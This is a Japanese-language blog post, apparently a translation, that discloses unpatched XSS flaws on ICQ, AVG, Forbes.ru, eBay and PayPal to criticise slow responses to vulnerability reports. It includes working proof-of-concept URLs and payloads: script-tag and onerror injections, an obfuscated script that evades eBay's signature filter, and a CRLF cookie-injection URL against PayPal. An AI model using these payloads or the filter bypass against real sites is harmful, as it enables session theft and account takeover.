0day *新年の脆弱性:ICQ、Ebay、Forbes、PayPal、およびAVG

私の投稿の1つで、さまざまなWebサイトの脆弱性に対する無責任な態度の問題に注意を向けようとしました。 状況を想像してください。あなたは情報セキュリティの分野の愛好家であり、有名なサイトで脆弱性を発見し、報告しようとしていますが、





そのような状況では、愛好家はほとんどの場合待機してから、脆弱性の詳細を明らかにします。 しかし問題は、宣伝があっても何も変わらないことです。 この投稿は、大規模なリソースの脆弱性についてのそのような発表(つまり、提供されるすべての情報が長い間公開されている)の編集です。おそらく何かが変わるでしょう。



投稿にはXSS脆弱性が選択されました(もちろん、これは攻撃ですが、それについては話していません)。 クライアント側であり、アクティブなサーバー側の脅威を持たないため。



XSS -JSをターゲットサイトに埋め込み、以下を実行する機能 許可されたユーザーによる任意のアクション(クロスドメインアクションを実行できる場合は「フル」と見なされます)。 場合によっては、ユーザーアカウントを完全に「削除」できます(Cookieの盗難、パスワードの変更)。



以下のすべての脆弱性は、投稿の執筆時点で修正されていません。 「0day」



ICQ.com、XSSを反映







ロシアでの人気による627サイト。 昔は-世界で最も人気のあるインスタントメッセンジャー。 それはxssを反映していますが、Chromeでも動作します



http://search.icq.com/search/selected_img.php?site_url=javascript:alert(document.domain)



AVG.com、XSSを反映









アメリカで90番目に人気があります。 アメリカの有名なアンチウイルス会社のサイト。 また、Chromeでの反映+パフォーマンス。



http://isearch.avg.com/videos?s=sideNav&cklang=en-en&cmpid=%27%3balert%28document.domain%29%3b%2f%2f&q=test



Forbes.ru、反射+ dom XSS



よく知られているフォーブス(ロシア連邦のトラフィックで164)。 任意のJSを実行できるため、たとえば、HabrahabrがForbesを購入したと書くなど、ページのコンテンツを変更できることを意味します。



画像

反映されたXSS: http ://www.forbes.ru/search-content ? keys = ">?<script> alert(document.domain)</ script> (FF)



画像

DOM XSS(Masha.JSライブラリの脆弱性)、 http: //forbes.ru/#sel= <img src = x onerror = alert(document.domain)>



Ebay.com、XSSの記録



米国で6番目に人気のある世界的に有名なオンラインオークション。 突然-XSS Stored! ebayには、サブポータル-members.ebay.comがあります。 ユーザーは、限定されたhtml / jsを署名に挿入できます(デフォルトでは、Cookieへのアクセスはありません)。 しかし、このフィルターをバイパスする機会があります-コードを難読化するだけです。



<script>var _0xf17c=["\x64\x6F\x6D\x61\x69\x6E"];alert(document[_0xf17c[0]]);</script>
      
      







画像



PayPal、CRLF + Cookie経由のXSS



米国で16番目に人気があります。 アスタリスク(*)にたどり着きました。 長い間、この脆弱性は、この発見者の報告後も修正されていませんでした。 PayPalによると、影響はなく、何も支払われません(実際、脆弱性は修正されませんでした)。 YouTubeでのビデオの公開後(公開前に送信された)、PayPalはすべてを修正しましたが、著者には答えませんでした...ここで、スクリプトは通常よりも少し複雑です。 ベクトルは次のとおりです。

  1. 最初のステップは、CRLFインジェクションを使用して任意のCookieをユーザーにインジェクトすることです(CRLFを介したCookieインジェクション)。たとえば、 www.paypal.com/.x%0dSet-Cookie:ololo=122;%20path=/;%20domain=.paypal.com



  2. Cookieが「クリーン」な形式でユーザーに表示される場所があります(ad.paypal.com/jin/cookie.jsp)








呼び出しは1つだけです。Webサイトの所有者の注意を記事の冒頭のポイントに引き付け、個人的な小規模なプロジェクトがある場合でも、脆弱性の報告に適切に対応することです。



明けましておめでとうございます!



All Articles